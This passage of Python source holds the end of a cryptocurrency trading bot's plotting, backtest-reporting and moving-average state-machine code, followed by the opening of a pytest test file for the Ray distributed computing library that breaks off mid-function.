stepsize = 86400
start, end = ax.get_xlim()
ax.xaxis.set_ticks(np.arange((end - end % 3600), start, -stepsize))
def timestamp(x, pos):
if not info['live']:
return (datetime.fromtimestamp(x)).strftime('%Y-%m-%d')
else:
return (datetime.fromtimestamp(x)).strftime('%m/%d %H:%M')
ax.xaxis.set_major_formatter(matplotlib.ticker.FuncFormatter(timestamp))
if info['tick'] > 1:
# force 'autoscale'
yd = [] # matrix of y values from all lines on plot
xd = [] # matrix of x values from all lines on plot
for n in range(len(plt.gca().get_lines())):
line = plt.gca().get_lines()[n]
yd.append((line.get_ydata()).tolist())
xd.append((line.get_xdata()).tolist())
yd = [item for sublist in yd for item in sublist]
ymin, ymax = np.min(yd), np.max(yd)
ax.set_ylim([0.95 * ymin, 1.05 * ymax])
xd = [item for sublist in xd for item in sublist]
xmin, xmax = np.min(xd), np.max(xd)
ax.set_xlim([xmin, xmax])
if (info['live'] is False):
# add sub minor ticks
set_sub_formatter = []
sub_ticks = [10, 11, 12, 14, 16, 18, 22, 25, 35, 45]
sub_range = [-8, 8]
for i in sub_ticks:
for j in range(sub_range[0], sub_range[1]):
set_sub_formatter.append(i * 10 ** j)
k = []
for l in set_sub_formatter:
if ymin < l < ymax:
k.append(l)
ax.set_yticks(k)
if info['live']:
start, end = ax.get_ylim()
stepsize = abs(start - end) / 25
ax.yaxis.set_ticks(np.arange(end, start, -stepsize))
plt.gcf().autofmt_xdate(rotation=30)
ax.title.set_color('darkorchid')
#plt.title(('%s ' % PAIR) + VERSION)
plt.tight_layout()
def plot_text(): # Display market condition on plot
# clear text
storage['text'] = storage.get('text', [])
for text in storage['text']:
try:
text.remove()
except:
pass
# static text
textx = 0.1 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.8 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
storage['text'].append(plt.text(textx, texty,
'litepresence', color='aqua',
alpha=0.2, size=70))
textx = 0.27 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.7 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
storage['text'].append(plt.text(textx, texty,
'EXTINCTION EVENT', color='aqua',
alpha=0.3, size=25, weight='extra bold'))
textx = 0.1 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.08 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
storage['text'].append(
plt.text(textx, texty, '(BTS) litepresence1',
color='white', alpha=0.5, size=10, weight='extra bold'))
textx = 0.4 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.1 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
storage['text'].append(
plt.text(textx, texty, (ASSET + CURRENCY),
color='yellow', alpha=0.1, size=70, weight='extra bold'))
textx = 0.6 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.05 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
text = 'BACKTEST '
if info['live']:
text = 'LIVE '
text += storage['asset_name']
storage['text'].append(
plt.text(textx, texty, text,
color='yellow', alpha=0.25, size=20, weight='extra bold'))
# dynamic text
if info['live']:
high = storage['cex_rate']
low = storage['cex_rate']
else:
high = storage['high'][-1]
low = storage['low'][-1]
textx = 0.1 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.1 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
if storage['market_cross']:
storage['text'].append(
plt.text(textx, texty, 'BULL MARKET',
color='lime', alpha=0.3, size=30, weight='extra bold'))
textx = 0.125 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.05 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
if low < storage['buying']:
storage['text'].append(
plt.text(textx, texty, 'BUY SUPPORT',
color='lime', alpha=0.5, size=20,
weight='extra bold'))
elif high > storage['selling']:
storage['text'].append(
plt.text(textx, texty, 'SELL OVERBOUGHT',
color='red', alpha=0.5, size=20,
weight='extra bold'))
else:
storage['text'].append(
plt.text(textx, texty, 'BEAR MARKET',
color='red', alpha=0.3, size=30, weight='extra bold'))
textx = 0.125 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.05 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
if low < storage['buying']:
storage['text'].append(
plt.text(textx, texty, 'BUY DESPAIR',
color='lime', alpha=0.5, size=20,
weight='extra bold'))
elif high > storage['selling']:
storage['text'].append(
plt.text(textx, texty, 'SELL RESISTANCE',
color='red', alpha=0.5, size=20, weight='extra bold'))
plt.tight_layout()
def test_plot(): # Display backtest plot
begin = info['begin']
end = info['end']
while (end - begin) > LIVE_PLOT_DEPTH:
# PLOT FORMAT
try:
ax = plt.gca()
# Window Plot
left, right = ax.set_xlim(left=begin - 50, right=end + 50)
# Prevent Memory Leak Outside Plot Window
for l in ax.get_lines():
xval = l.get_xdata()[0]
if (xval < begin):
l.remove()
if LIVE:
begin = begin + 0.3 * (end - begin)
else:
begin = end
plt.tight_layout()
plt.pause(0.0001)
except:
print('animated test plot failed')
plot_text()
plot_format()
# if LIVE: plt.clf() # clear the plotted figure; end log scale
if BACKTEST:
try:
plt.autoscale(enable=True, axis='y')
plt.pause(0.0001)
except:
print('static test plot failed')
def live_plot(): # Display live plot
now = int(time.time())
ax = plt.gca()
# Window Plot
ax.set_xlim(([(now - LIVE_PLOT_DEPTH), (now)]))
# Prevent Memory Leak Outside Plot Window; remove unnecessary data
for l in ax.get_lines():
xval = l.get_xdata()[0]
if (xval < (ax.get_xlim()[0])):
l.remove()
plot_text()
plt.tight_layout()
plt.pause(0.0001)
def test_stop(): # Display results of backtest session
close = storage['close'][-1]
# ctime_tick_labels()
# move to currency
if BACKTEST and (portfolio['assets'] > 0.1) and CURRENCY_STOP:
print('stop() EXIT TO CURRENCY')
test_sell(price=close)
# calculate return on investment
end_max_assets = portfolio['assets'] + (portfolio['currency'] / close)
end_max_currency = portfolio['currency'] + (portfolio['assets'] * close)
roi_assets = end_max_assets / storage['begin_max_assets']
roi_currency = end_max_currency / storage['begin_max_currency']
storage['roi_currency'] = roi_currency
days = (info['end'] - info['begin']) / 86400.0
frequency = (SATOSHI + storage['trades']) / days
storage['dpt'] = 1.0 / frequency
# A = P*(1+(r/n))**(n*t)
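# compound-interest relation solved for the rate: with principal P, final amount A,
# n compounding periods per year and t years, r = n * ((A / P) ** (1 / (n * t)) - 1);
# with n = 1 this is simply the annualised growth rate of the currency valuation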
P = storage['begin_max_currency']
t = DAYS / 365.0
A = end_max_currency
n = 1.0
r = n * ((A / P) ** (1 / (n * t)) - 1)
storage['apy_currency'] = r
if LIVE or BACKTEST:
print(
'===============================================================')
print(('START DATE........: %s' % time.ctime(info['begin'])))
print(('END DATE..........: %s' % time.ctime(info['end'])))
print(('DAYS..............: %.1f' % days))
print(('TRADES............: %s' % storage['trades']))
print(('DAYS PER TRADE....: %.1f' % storage['dpt']))
print(('START PRICE.......: %.8f ' % data['close'][-DAYS]))
print(('END PRICE.........: %.8f' % close))
print(('START PORTFOLIO...: %.1f %s %.1f %s' %
(START_CURRENCY, CURRENCY, START_ASSETS, ASSET)))
print(
('START MAX ASSETS..: %s %s' %
(storage['begin_max_assets'], ASSET)))
print(('END MAX ASSETS....: %s %s' % (end_max_assets, ASSET)))
print(('ROI ASSETS........: %.2fX' % roi_assets))
print(('START MAX CURRENCY: %s %s' %
(storage['begin_max_currency'], CURRENCY)))
print(('END MAX CURRENCY..: %s %s' % (end_max_currency, CURRENCY)))
print(('ROI CURRENCY......: %.2fX' % roi_currency))
# print(('APY CURRENCY......: %.2f' % storage['apy_currency']))
print(
'===============================================================')
print(VERSION)
print('~===END BACKTEST=========================~')
test_rechart_orders()
def print_tune(): # Display input thresholds
storage['roi_currency'] = storage.get('roi_currency', ROI)
storage['apy_currency'] = storage.get('apy_currency', APY)
storage['dpt'] = storage.get('dpt', DPT)
storage['trades'] = storage.get('trades', 0)
frequency = (SATOSHI + storage['trades']) / DAYS
z = '+=' if OPTIMIZE else '='
print('#######################################')
print(('CURRENCY = "%s"' % CURRENCY))
print(('ASSET = "%s"' % ASSET))
print(('MA1 %s %.2f' % (z, MA1)))
print(('MA2 %s %.2f' % (z, MA2)))
print(('SELLOFF %s %.3f' % (z, SELLOFF)))
print(('SUPPORT %s %.3f' % (z, SUPPORT)))
print(('RESISTANCE %s %.3f' % (z, RESISTANCE)))
print(('DESPAIR %s %.3f' % (z, DESPAIR)))
print(('MIN_CROSS %s %.3f' % (z, MIN_CROSS)))
print(('MAX_CROSS %s %.3f' % (z, MAX_CROSS)))
print(('BULL_STOP %s %.3f' % (z, BULL_STOP)))
print(('BEAR_STOP %s %.3f' % (z, BEAR_STOP)))
print('#######################################')
# print(('# RESOLUTION : %s' % RESOLUTION))
print(('# DAYS : %s' % DAYS))
print(('DPT = %.1f' % storage['dpt']))
print(('# MARKET CAP....: %.1fM' % asset_cap))
print(('# DOMINANCE.....: %.4f - RANK %s' % (asset_dominance, asset_rank)))
print(('ROI = %.2fX' % storage['roi_currency']))
# print(('APY = %.2f' % storage['apy_currency']))
print('#######################################')
def bell(duration=2, frequency=432): # Activate linux audible bell
pass
'''
os.system('play --no-show-progress --null --channels 1 synth' +
' %s sine %f' % (duration*1000, frequency))
'''
def gmail():
pass
'''
send_to = "THE EMAIL ADDRESS TO SEND TO"
send_from = "YOUR EMAIL ADDRESS"
password = "YOUR PASSWORD"
msg = "YOUR MESSAGE!"
import smtplib
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(send_from, password)
server.sendmail(send_from, send_to, msg)
server.quit()
'''
# DIAGNOSTICS
# ======================================================================
def msg_(e): # traceback message
print(' !@#$%^&*(){}[]{}()*&^%$#@!')
print('send questions, comments, and pastebin of pertinent logs')
print('to @litepresence on telegram for faster development')
print('')
return ('=========================================================================='+
'\n\n' + str(time.ctime()) + ' ' + str(type(e).__name__) +
'\n\n' + str(e.args) +
'\n\n' + str(traceback.format_exc()) +
'\n\n' )
def diagnostics(level=[]):
try:
import psutil # REQUIRES MODULE INSTALL
proc = psutil.Process()
if 1 in level:
num_open_files = proc.num_fds()
print('')
print('file descriptors:', num_open_files)
print('connections:', len(proc.connections()))
if 2 in level:
import psutil
proc = psutil.Process()
n = 1
open_files = proc.open_files()
for i in range(len(open_files)):
if 'ttf' not in str(open_files[i]):
print (n, str(open_files[i]).split('/')[-1])
n+=1
print(proc.io_counters())
connections = proc.connections()
for i in range(len(connections)):
print (i, connections[i])
print('')
processes = list(psutil.process_iter()) # materialize the iterator so it can be indexed
for i in range(len(processes)):
print(i, processes[i])
print('')
except Exception as e:
msg = str(type(e).__name__) + str(e.args) + ' psutil'
print(msg)
if 3 in level:
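# Linux-only: enumerate this process's open file descriptors by reading the
# /proc/self/fd symlinks (will not work on platforms without procfs)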
fds = {}
base = '/proc/self/fd'
for num in os.listdir(base):
try:
fds[int(num)] = os.readlink(os.path.join(base, num))
except:
pass
print(fds)
print('')
# DATA PROCESSING
# ======================================================================
def clock(): # 24 hour clock formatted HH:MM:SS
return str(time.ctime())[11:19]
def satoshi(n): # format prices to satoshi type
return float('%.8f' % float(n))
def satoshi_str(n):
return ('%.8f' % float(n))
def dictionaries(): # Global info, data, portfolio, and storage
global info, storage, portfolio, book
info = {}
book = {}
storage = {}
portfolio = {}
def coin_name(): # Convert ticker symbols to coin names
curr = currencies()
storage['asset_name'] = curr[ASSET]['CoinName']
storage['currency_name'] = curr[CURRENCY]['CoinName']
print((storage['asset_name']))
def ctime_tick_labels(): # X axis timestamps formatting
ax = plt.gca()
fig.canvas.draw()
labels = ax.get_xticklabels()
xlabels = []
for label in labels:
x = label.get_text()
print(x)
try:
xlabels.append(float(x))
except:
xlabels.append(str(x))
for i in range(len(xlabels)):
try:
if isinstance(xlabels[i], float):
xlabels[i] = time.ctime(float(xlabels[i]))
except:
pass
ax.set_xticklabels(xlabels)
def indicators(): # Post process data
global storage
global book
ma1_period = MA1 * 86400.0 / CANDLE
ma2_period = MA2 * 86400.0 / CANDLE
if not info['live']:
# alpha moving averages
storage['ma1'] = float_sma(storage['close'], ma1_period)
storage['ma2'] = float_sma(storage['close'], ma2_period)
if info['live']:
# alpha moving averages
storage['ma1'] = float_sma(
data['7200']['close'], ma1_period)
storage['ma2'] = float_sma(
data['7200']['close'], ma2_period)
# scalp moving averages
storage['ma3'] = float_sma(data['300']['close'], 288 * MA3)
storage['ma4'] = float_sma(data['300']['close'], 288 * MA4)
# 20 minute high and low
storage['high'] = max(data['300']['high'][-4:])
storage['low'] = min(data['300']['low'][-4:])
cex_rate = storage['cex_rate']
# means to buy and percent invested
assets = portfolio['assets']
currency = portfolio['currency']
means = storage['means'] = currency / cex_rate
max_assets = storage['max_assets'] = (assets + means)
storage['max_currency'] = max_assets * cex_rate
storage['asset_ratio'] = assets / max_assets
portfolio['percent_invested'] = 100 * storage['asset_ratio']
portfolio['percent_divested'] = 100 - portfolio['percent_invested']
# recent volume ratio for plotting
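# (m_volume = current 5-minute volume over the mean of the last 100 candles,
#  clamped to [1, 5]; live_chart() uses it to scale marker size)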
depth = 100
mv = ((depth * data['300']['volume'][-1]) /
sum(data['300']['volume'][-depth:]))
storage['m_volume'] = 1 if mv < 1 else 5 if mv > 5 else mv
def float_sma(array, period): # floating point period moving average
def moving_average(array, period): # numpy array moving average
csum = np.cumsum(array, dtype=float)
csum[period:] = csum[period:] - csum[:-period]
return csum[period - 1:] / period
if period == int(period):
return moving_average(array, int(period))
else:
floor_period = int(period)
ceil_period = int(floor_period + 1)
floor_ratio = ceil_period - period
ceil_ratio = 1.0 - floor_ratio
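# blend the two integer-period SMAs, e.g. period 10.25 returns
# 0.75 * SMA(10) + 0.25 * SMA(11)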
floor = moving_average(array, floor_period)
ceil = moving_average(array, ceil_period)
depth = min(len(floor), len(ceil))
floor = floor[-depth:]
ceil = ceil[-depth:]
ma = (floor_ratio * floor) + (ceil_ratio * ceil)
return ma
# ARTIFICIAL INTELLIGENCE
# ======================================================================
def state_machine(): # Alpha and beta market finite state
# localize primary indicators
ma1 = storage['ma1'][-1]
ma2 = storage['ma2'][-1]
min_cross = storage['min_cross'] = MIN_CROSS * ma1
max_cross = storage['max_cross'] = MAX_CROSS * storage['min_cross']
# set alpha state
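# the flag turns bullish when MIN_CROSS * ma1 rises above ma2 and turns bearish only
# when MAX_CROSS * (MIN_CROSS * ma1) falls below ma2; for tunes with MAX_CROSS >= 1
# these two thresholds form a hysteresis band that damps flip-flopping at the crossover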
storage['market_cross'] = storage.get('market_cross', MARKET_CROSS)
if storage['market_cross'] is False:
if (min_cross > ma2):
storage['market_cross'] = True
if storage['market_cross'] is True:
if (max_cross < ma2):
storage['market_cross'] = False
# Manual override alpha state
if info['live']:
if FORCE_ALPHA == 'BULL':
storage['market_cross'] = True
if FORCE_ALPHA == 'BEAR':
storage['market_cross'] = False
# establish beta thresholds
storage['selloff'] = (ma1 * SELLOFF)
storage['support'] = max(ma1 * SUPPORT, ma2 * BULL_STOP)
storage['resistance'] = min(ma1 * RESISTANCE, ma2 * BEAR_STOP)
storage['despair'] = (ma1 * DESPAIR)
# initialize backtest per MARKET_CROSS
if (info['live'] is False) and (info['tick'] == 0):
close = storage['close'][-1]
storage['selling'] = storage['buying'] = close
if MARKET_CROSS is True:
if START_CURRENCY > 0:
test_buy(close)
if MARKET_CROSS is False:
if START_ASSETS > 0:
test_sell(close)
# set beta state
if storage['market_cross']:
storage['buying'] = storage['support']
storage['selling'] = storage['selloff']
else:
storage['buying'] = storage['despair']
storage['selling'] = storage['resistance']
storage['mid_market'] = (storage['buying'] + storage['selling']) / 2
def optimizer():
pass
# PRIMARY PROCESS
# ======================================================================
if __name__ == "__main__":
race_write(doc='EV_log.txt', text=time.ctime())
banner()
version()
tune_install()
keys_install()
asset_cap, asset_dominance, asset_rank = marketcap()
optimize = False
data = {}
control_panel()
dictionaries()
initialize()
test_initialize()
coin_name()
if (MODE in [2, 3, 6]) or BACKTEST:
backtest()
print_tune()
if MODE in [2, 3, 6]:
print('')
print('report errors to litepresence for faster development')
print('')
live()
if OPTIMIZE:
optimizer()
print ('https://www.youtube.com/watch?v=5ydqjqZ_3oc')
sys.exit()
# ======================================================================
''' EXTINCTION EVENT '''
# ======================================================================
#
# THE DESTROYER,
# litepresence - 2018
#
|
test_advanced.py
|
# coding: utf-8
from concurrent.futures import ThreadPoolExecutor
import json
import logging
import random
import sys
import threading
import time
import os
import numpy as np
import pytest
import ray.cluster_utils
import ray._private.profiling as profiling
from ray._private.test_utils import (client_test_enabled,
RayTestTimeoutException, SignalActor)
if client_test_enabled():
from ray.util.client import ray
else:
import ray
logger = logging.getLogger(__name__)
# issue https://github.com/ray-project/ray/issues/7105
@pytest.mark.skipif(client_test_enabled(), reason="internal api")
def test_internal_free(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
class Sampler:
def sample(self):
return [1, 2, 3, 4, 5]
def sample_big(self):
return np.zeros(1024 * 1024)
sampler = Sampler.remote()
# Free deletes from in-memory store.
obj_ref = sampler.sample.remote()
ray.get(obj_ref)
ray.internal.free(obj_ref)
with pytest.raises(Exception):
ray.get(obj_ref)
# Free deletes big objects from plasma store.
big_id = sampler.sample_big.remote()
ray.get(big_id)
ray.internal.free(big_id)
time.sleep(1) # wait for delete RPC to propagate
with pytest.raises(Exception):
ray.get(big_id)
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(input_list):
# The argument input_list should be a list containing one object ref.
ray.wait([input_list[0]])
@ray.remote
def h(input_list):
# The argument input_list should be a list containing one object ref.
ray.get(input_list[0])
# Make sure that multiple wait requests involving the same object ref
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ref all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
@pytest.mark.skipif(client_test_enabled(), reason="internal api")
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
@pytest.mark.skipif(client_test_enabled(), reason="internal api")
def test_running_function_on_all_workers(ray_start_regular):
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
# the function should only run on the current driver once.
assert sys.path[-1] == "fake_directory"
if len(sys.path) > 1:
assert sys.path[-2] != "fake_directory"
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
@pytest.mark.skipif(
"RAY_PROFILING" not in os.environ,
reason="Only tested in client/profiling build.")
def test_profiling_api(ray_start_2_cpus):
@ray.remote
def f():
with profiling.profile(
"custom_event", extra_data={"name": "custom name"}):
pass
ray.put(1)
object_ref = f.remote()
ray.wait([object_ref])
ray.get(object_ref)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
profile_data = ray.timeline()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
# TODO (Alex) :https://github.com/ray-project/ray/pull/9346
# "register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
if time.time() - start_time > timeout_seconds:
raise RayTestTimeoutException(
"Timed out while waiting for information in "
"profile table. Missing events: {}.".format(
set(expected_types) - set(event_types)))
# The profiling information only flushes once every second.
time.sleep(1.1)
def test_wait_cluster(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
ray.init(address=cluster.address)
@ray.remote(resources={"RemoteResource": 1})
def f():
return
# Make sure we have enough workers on the remote nodes to execute some
# tasks.
tasks = [f.remote() for _ in range(10)]
start = time.time()
ray.get(tasks)
end = time.time()
# Submit some more tasks that can only be executed on the remote nodes.
tasks = [f.remote() for _ in range(10)]
# Sleep for a bit to let the tasks finish.
time.sleep((end - start) * 2)
_, unready = ray.wait(tasks, num_returns=len(tasks), timeout=0)
# All remote tasks should have finished.
assert len(unready) == 0
@pytest.mark.skip(reason="TODO(ekl)")
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(address=cluster.address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_refs = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_ref in object_refs:
ray.get([
f._remote(args=[object_ref], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.state.object_transfer_timeline()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(ray_start_regular):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g(): # noqa: F811
return 2
@ray.remote # noqa: F811
def g(): # noqa: F811
return 3
@ray.remote # noqa: F811
def g(): # noqa: F811
return 4
@ray.remote # noqa: F811
def g(): # noqa: F811
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(ray_start_regular):
# Verify that we cannot call put on an ObjectRef.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
@pytest.mark.skipif(
client_test_enabled(), reason="grpc interaction with releasing resources")
def test_multithreading(ray_start_2_cpus):
# This test requires at least 2 CPUs to finish since the worker does not
# release resources when joining the threads.
def run_test_in_multi_threads(test_case, num_threads=10, num_repeats=25):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
@ray.remote
class Echo:
def echo(self, value):
return value
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000.0,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor:
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000.0,
)
assert len(ready) == len(wait_objects)
for _ in range(20):
num = 10
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(10)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
assert ray.get(actor.join.remote()) == "ok"
@pytest.mark.skipif(client_test_enabled(), reason="internal api")
def test_wait_makes_object_local(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(address=cluster.address)
@ray.remote
class Foo:
def method(self):
return np.zeros(1024 * 1024)
a = Foo.remote()
# Test get makes the object local.
x_id = a.method.remote()
assert not ray.worker.global_worker.core_worker.object_exists(x_id)
ray.get(x_id)
assert ray.worker.global_worker.core_worker.object_exists(x_id)
# Test wait makes the object local.
x_id = a.method.remote()
assert not ray.worker.global_worker.core_worker.object_exists(x_id)
ok, _ = ray.wait([x_id])
assert len(ok) == 1
assert ray.worker.global_worker.core_worker.object_exists(x_id)
@pytest.mark.skipif(client_test_enabled(), reason="internal api")
def test_future_resolution_skip_plasma(ray_start_cluster):
cluster = ray_start_cluster
# Disable worker caching so worker leases are not reused; set object
# inlining size threshold and enable storing of small objects in in-memory
# object store so the borrowed ref is inlined.
cluster.add_node(
num_cpus=1,
resources={"pin_head": 1},
_system_config={
"worker_lease_timeout_milliseconds": 0,
"max_direct_call_object_size": 100 * 1024,
"put_small_object_in_memory_store": True,
},
)
cluster.add_node(num_cpus=1, resources={"pin_worker": 1})
ray.init(address=cluster.address)
@ray.remote(resources={"pin_head": 1})
def f(x):
return x + 1
@ray.remote(resources={"pin_worker": 1})
def g(x):
borrowed_ref = x[0]
f_ref = f.remote(borrowed_ref)
# borrowed_ref should be inlined on future resolution and shouldn't be
# in Plasma.
assert ray.worker.global_worker.core_worker.object_exists(
borrowed_ref, memory_store_only=True)
return ray.get(f_ref) * 2
one = ray.put(1)
g_ref = g.remote([one])
assert ray.get(g_ref) == 4
def test_task_output_inline_bytes_limit(ray_start_cluster):
cluster = ray_start_cluster
# Disable worker caching so worker leases are not reused; set object
# inlining size threshold and enable storing of small objects in in-memory
# object store so the borrowed ref is inlined.
# set task_rpc_inlined_bytes_limit which only allows inline 20 bytes.
cluster.add_node(
num_cpus=1,
resources={"pin_head": 1},
_system_config={
"worker_lease_timeout_milliseconds": 0,
"max_direct_call_object_size": 100 * 1024,
"task_rpc_inlined_bytes_limit": 20,
"put_small_object_in_memory_store": True,
},
)
cluster.add_node(num_cpus=1, resources={"pin_worker": 1})
ray.init(address=cluster.address)
@ray.remote(num_returns=5, resources={"pin_head": 1})
def f():
return list(range(5))
@ray.remote(resources={"pin_worker": 1})
def sum():
numbers = f.remote()
result = 0
for i, ref in enumerate(numbers):
result += ray.get(ref)
inlined = ray.worker.global_worker.core_worker.object_exists(
ref, memory_store_only=True)
if i < 2:
assert inlined
else:
assert not inlined
return result
assert ray.get(sum.remote()) == 10
def test_task_arguments_inline_bytes_limit(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
num_cpus=1,
resources={"pin_head": 1},
_system_config={
"max_direct_call_object_size": 100 * 1024,
# if task_rpc_inlined_bytes_limit is greater than
# max_grpc_message_size, this test fails.
"task_rpc_inlined_bytes_limit": 18 * 1024,
"max_grpc_message_size": 20 * 1024,
"put_small_object_in_memory_store": True,
},
)
cluster.add_node(num_cpus=1, resources={"pin_worker": 1})
ray.init(address=cluster.address)
@ray.remote(resources={"pin_worker": 1})
